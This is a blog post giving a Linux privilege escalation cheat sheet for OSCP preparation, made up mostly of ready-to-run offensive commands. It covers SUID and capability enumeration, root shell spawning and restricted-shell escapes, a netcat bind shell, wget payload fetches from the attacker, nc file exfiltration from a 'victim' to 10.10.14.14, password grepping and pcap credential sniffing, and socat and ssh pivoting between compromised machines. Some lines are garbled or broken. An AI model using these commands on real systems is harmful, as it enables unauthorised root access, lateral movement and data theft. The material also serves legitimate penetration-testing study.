Hello Everyone, below is the privilege escalation cheat sheet
that I used to pass my OSCP certification. You can find lots of commands mixed
to enumerate through a lot of situations. There might be few commands which might
not be work on all the distortion of Linux. Feel free to comment below if I missed any useful commands. If you are looking for the Linux Privilege Escalation Techniques here you go --> Linux Privilege Escalation Techniques and here is Windows Privilege Escalation command and Techniques Simple Linux Priv Esc Checklist
1. sudo -l
2.sudo su
3. uname -a /version --> check for vuln
4. Check for files with root priv
5. Check for cron jobs
6. /etc/passwd file --> writable ?
7. #PATH exploit
8. Check for process with root
9. Run pspy to check for running processes & cron jobs
10.Check .bash_history
11.ls -la the home directory
12.Check /opt/, /var/www/html, /home/, /root, / , directories thoroughly
13.Check for World Readable files
14.Check if mysql is running as
root.
15."mount" command to check for permissions on folders/processes
16.Run "pspy -f" on the target and check for all running file system tasks
17.Check for file/folder permissions, even u dont own the file, folder might be owned by you, where you
can add/delete files/filenames.
Ex: File is running as Root; folder owner is you.; delete the file and create a
new file with the same name. you can get root access.
THIS IS MERELY CREATED FOR EDUCATIONAL & ETHICAL PURPOSE ONLY, AUTHOR IS NOT RESPONSIBLE FOR ANY ILLEGAL ACTIVITIES DONE BY THE VISITORS
Linux Privilege Escalation Cheatsheet
sudo -l --> Check for root priv directories and applications
sudo bash --> Get Root Shell
sudo id --> Check Privilege level
Operating System Details uname -a cat /proc/version
ps aux | grep root --> check for Applications running with root ps -ef
dpkg -l --> list all available packages.
python -c 'import pty;pty.spawn("/bin/bash")' --> spwan a python shell; sometimes python3 works as well
Get Interactive Shell: python -c 'import pty;pty.spawn("/bin/bash")' ctrl +Z stty raw -echo fg export TERM=xterm
Finding Files with Root Privileges:
find / -perm -4000 2>/dev/null | xargs ls -la
Finding World Readable Files: find / -perm -2 ! -type l -ls 2>/dev/null World Writable & Executable files find / \( -perm -o w -perm -o x \) -type d 2>/dev/null World Executable Folders: find / -perm -o x -type d 2>/dev/null
Find SUID & SGID Binaries:
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done
find / -perm -1000 -type d 2>/dev/null #Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null #SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null #SUID (chmod 4000) - run as the owner, not the user who started it.
List the Capabilities of files which has Root Privileges
getcap -r / 2>/dev/null
Linux Capalilities - 40 Using Capabiliies
#List all Capabilities
#cap_sys_module is exploitable
capsh --print
Priv Esc using Sys_Module Capability in Docker
Find Services Running Behind Firewall/Localhost netstat -ano netstat -tulpn
CRON Jobs
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
find . -type f -ls --> /Find files in all directories
python -m SimpleHTTPServer 8080 --> Start a communication server on your system wget http://yourip/LinuxEnum.sh --> Run this in target machine to get this file
Send a File From Kali To Victim nc -nlvp 9001 < exploit.c --> Transfer files from Kali nc YourIpAddress 8001 > /tmp/exploit.c --> Get the file On Target Machine
Get a File From Victim to Kali on Kali: nc -l -p 8001 > filefoldername on victim: nc -w 5 10.10.14.14 8001 < /usr/local/bin/filename
When anything can only be run as a specific user: sudo -u UserName /bin/bash /works when you see this in sudo -l
Port Scanning with NMAP:
for ip in $(seq 1 65535); do nc -nvzw1 VICTIM_IP $p 2>&1; done | grep open
Dynamic Port Forwarding nano /etc/proxychains.conf #add the below line socks5 127.0.0.1 1080 On Terminal: ssh -D 1080 root@10.10.10.10 /Need Password proxychains netdiscover -r 10.10.10.10/24
Local Port Forwarding using ssh
ssh -L 1080:127.0.0.1:80 root@10.10.10.10
Remote Port Forwarding using SSH
ssh -R 1080:127.0.0.1:80 root@10.10.10.10
Port Forwarding using Netcat
nc -l -p $localport -c "nc $remotehost $remoteport"
netcat -nvlp 9001 /Listen on port 9001
netcat -l -p 9001 -e /bin/bash /Create a bash shell on port 9001
netcat -L KALI_IP:80 -p 8902 /Forward local port 9002 to remote port 80
netcat -L kali_IP:80 -p 9002 -x /Port Forward Hex dump
Port Forwarding using mknod
mknod can be used to make files,directories and FIFO's(Named Pipe)
mknod backpipe p / p = create a named pipe
nc -l -p Allowed_Inbound_port 0<backpipe | nc 127.0.0.1 22 1>backpipe
1 = Standard Output
0 = Standard Input
Netcat Relay to Forward SSH on our linux machine with Scenario
you are on a windows box, trying to connect to a linux machine whose SSH-22 port inbound traffic is blocked.
we have a shell on linux machine but not ssh -so trying to get into ssh
so, find some port which is open on Linux machine, and use nc to communicate, ex:4444
on Linux Machine:
We need to transfer traffic from port 22 to 4444 and access it on windows machine.
mknod /tmp/backpipe p
nc -l -p 4444 0</tmp/backpipe | nc localhost 22 1>/tmp/backpipe
Port Forwarding using SoCat: Start a socat listener on Victim_macine2 - Port 8009 & 8080, and listen it on First compromisted machine. From Victim-1 machine: do a port scan as above and port forrward the required ports /Binding the VICTIM-2 ports to Victim-1 Machine so,that we can access it from our Kali machine socat tcp-listen:8009,fork tcp:VICTIM2_IP:8009 & socat tcp-listen:8080,fork tcp:VICTIM2_IP:8080 & netstart -plunt /View the binded ports, we can see 8009 & 8080 in Victim_machine1 Access the Victim-2 Ports on our Kali Machine:on Victim-1 Machine: socat tcp-listen:4321,fork tcp:KALI_IP:4321 &
Compiling Exploit
gcc exploit.c -pthread -lcrypt -o Exploit --> Compile The Exploit
gcc -m32 -Wl,--hash-style=both 9542.c -o exploit --> Compiling 32-bit Exploit
./Exploit
Check for Unmounted Drives
cat etc/fstab
cat .bash_history --> Check the Commands History
cho os.system("/bin/bash") --> Escaping Limited Shell using ssh
df -h --> Get List of Machine Partitions (Mounted Devices as well)
/dev/shm --> can copy any files into this location and run without permissions
cat /dev/sdb --> Might contain deleted data in the partition can try strings /dev/sdb for flags
find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null --> all files and dir with root access
Grep Recursively for a string
grep -iRI 'password'
#Grep for a username/string
grep 'bhanu' /etc -R 2>/dev/null
tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/sh
--> get a proper shell from a restricted shell
mysql -u root -p // logging as a root in mysql \! ls -l //Execute Commands
Finding Passwords from a PCAP file using TCPDUMP:
tcpdump -nt -r capture.pcap -A 2>/dev/null | grep -P 'pwd='
If I missed
something, feel free to command below and If you are looking for the Linux
Privilege Escalation Techniques here you go --> Linux
Privilege Escalation Techniques
No comments:
Post a Comment